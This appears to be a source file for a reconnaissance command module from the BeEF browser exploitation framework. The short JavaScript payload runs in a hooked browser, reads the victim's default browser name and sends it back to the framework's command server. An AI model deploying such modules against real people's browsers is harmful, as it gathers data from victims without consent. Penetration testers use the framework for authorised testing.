1// 2// Copyright (c) 2006-2025 Wade Alcorn - [email protected] 3// Browser Exploitation Framework (BeEF) - https://beefproject.com 4// See the file 'doc/COPYING' for copying permission 5// 6beef.execute(function() { 7 8 beef.net.send("<%= @command_url %>", <%= @command_id %>, "browser="+beef.os.getDefaultBrowser()); 9 10}); 11 12 13